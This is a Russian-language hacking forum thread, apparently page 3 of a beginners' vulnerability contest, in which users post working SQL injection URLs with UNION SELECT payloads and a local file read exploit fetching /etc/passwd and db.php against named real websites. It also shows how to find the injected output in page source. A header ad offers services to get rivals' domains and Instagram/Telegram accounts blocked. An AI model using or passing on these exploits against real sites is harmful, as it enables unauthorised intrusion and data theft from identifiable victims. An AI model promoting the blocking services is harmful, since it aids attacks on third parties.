УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Конкурс уязвимостей для новичков

Страница 3 из 15

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#21

15.06.2015, 13:36

BabaDook

Guest

Сообщений: n/a

Провел на форуме:
238786

Репутация: 40

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.immobilien-niederzier.com/view_detail.php?siteid=999999.9%20union%20all%20select%201,2,3,version()[/COLOR][/COLOR]

Автор, скажите пожалуйста версию, и где вывод

#22

15.06.2015, 13:54

Neon2211

Guest

Сообщений: n/a

Провел на форуме:
885

Репутация: 0

Цитата:

Сообщение от yarbabin

yarbabin said:
↑
очень много повторов, два из них отсюда:
http://pastebin.com/tRpAyh1t

Кстати не одну из уезвимостей не брал на этом сайте http://pastebin.com/

Искал через софт !

#23

15.06.2015, 14:11

kingbeef

Новичок

Регистрация: 08.04.2010

Сообщений: 1

Провел на форуме:
70640

Репутация: 0

Цитата:

Сообщение от BabaDook

BabaDook said:
↑

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.immobilien-niederzier.com/view_detail.php?siteid=999999.9%20union%20all%20select%201,2,3,version()[/COLOR][/COLOR]

Автор, скажите пожалуйста версию, и где вывод

Вывод в исходном коде.

Код:

Code:
http://www.immobilien-niederzier.com/view_detail.php?siteid=999999.9%20union%20all%20select%20111111111111111,22222222222,333333333333,44444444444

Нажимаем ctrl+f и ищем 4444444

Нашли на 473 строке

Код:

Code:
http://www.immobilien-niederzier.com/view_detail.php?siteid=999999.9%20union%20all%20select%20111111111111111,22222222222,333333333333,version()

выдает нам на 473 строке

Код:

Code:
var image2 = new Image();image2.src = 'http://www.immospaze.de/images/5.1.73-community';

#24

15.06.2015, 15:02

BabaDook

Guest

Сообщений: n/a

Провел на форуме:
238786

Репутация: 40

Цитата:

Сообщение от kingbeef

kingbeef said:
↑
Вывод в исходном коде.

Код:

Code:
http://www.immobilien-niederzier.com/view_detail.php?siteid=999999.9%20union%20all%20select%20111111111111111,22222222222,333333333333,44444444444

Нажимаем ctrl+f и ищем 4444444
Нашли на 473 строке

Код:

Code:
http://www.immobilien-niederzier.com/view_detail.php?siteid=999999.9%20union%20all%20select%20111111111111111,22222222222,333333333333,version()

выдает нам на 473 строке

Код:

Code:
var image2 = new Image();image2.src = 'http://www.immospaze.de/images/5.1.73-community';

Вы же не автор. вывод подключаемой картинке срц=вывод . Мне просто иногда кажется что...

#25

15.06.2015, 17:03

Neon2211

Guest

Сообщений: n/a

Провел на форуме:
885

Репутация: 0

Сайт:http://www.cqtailian.com/

Уязвимость:SQLi

Эксплойт:

Код:

Code:
http://www.cqtailian.com/Content.php?categoryid=999999.9%20union%20all%20select%20999,2,3,4,5

#26

15.06.2015, 17:17

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

Провел на форуме:
1066435

Репутация: 1013

Цитата:

Сообщение от Neon2211

Neon2211 said:
↑
Сайт:
http://www.cqtailian.com/
Уязвимость:SQLi
Эксплойт:

Код:

Code:
http://www.cqtailian.com/Content.php?categoryid=999999.9%20union%20all%20select%20999,2,3,4,5

а вот тут вывода нет.

#27

16.06.2015, 19:40

semen6192

Guest

Сообщений: n/a

Провел на форуме:
6419

Репутация: 2

Сайт: http://jithubhq.microbold.net/tutori...ials.php?id=11

Уязвимость: SQLi

Эксплойт: http://jithubhq.microbold.net/tutori...als.php?id=-11 UNION SELECT @@Version,2,3,4 --

#28

17.06.2015, 21:58

artificer

Guest

Сообщений: n/a

Провел на форуме:
362

Репутация: 0

Сайт:http:www.brzozo.com

Уязвимость:Local File Reading

Эксплойт:

Код:

Code:
http://www.brzozo.com/force-download.php?file=/etc/passwd
http://www.brzozo.com/force-download.php?file=db.php
http://www.brzozo.com/popup.php
http://www.brzozo.com/popup.php?id=1

Так принимается?

#29

17.06.2015, 22:26

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

Провел на форуме:
1066435

Репутация: 1013

Цитата:

Сообщение от artificer

artificer said:
↑
Сайт:
http:
www.brzozo.com
Уязвимость:Local File Reading
Эксплойт:

Код:

Code:
http://www.brzozo.com/force-download.php?file=/etc/passwd
http://www.brzozo.com/force-download.php?file=db.php
http://www.brzozo.com/popup.php
http://www.brzozo.com/popup.php?id=1

Так принимается?

принимается, однако в гугле уже эта уязвимость есть, а касаемо повторов есть правило

#30

18.06.2015, 00:27

Neon2211

Guest

Сообщений: n/a

Провел на форуме:
885

Репутация: 0

Сайт:www.stateofemergencyltd.com

Уязвимость:SQLi

Эксплойт:

Код:

Code:
http://www.stateofemergencyltd.com/news.php?id=999999.9 union all select 1,[t],3,4,5,6,7

Сайт:www.upani.com

Уязвимость:SQLi

Эксплойт:

Код:

Code:
http://www.upani.com/productinfo.php?pid=85' and [t] and '1'='1&cid=5&psid=rajpur-collection-invitation-box

Cайт:www.corpsport.com

Уязвимость:SQLi

Эксплойт:

Код:

Code:
http://www.corpsport.com/productDetails.php?id=999999.9 union all select 1,[t],3,4,5

Cайт:www.immobilien-niederzier.com

Уязвимость:SQLi

Эксплойт:

Код:

Code:
http://www.immobilien-niederzier.com/view_detail.php?siteid=999999.9%20union%20all%20select%201,2,3,[t]

Страница 3 из 15

Последняя »

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход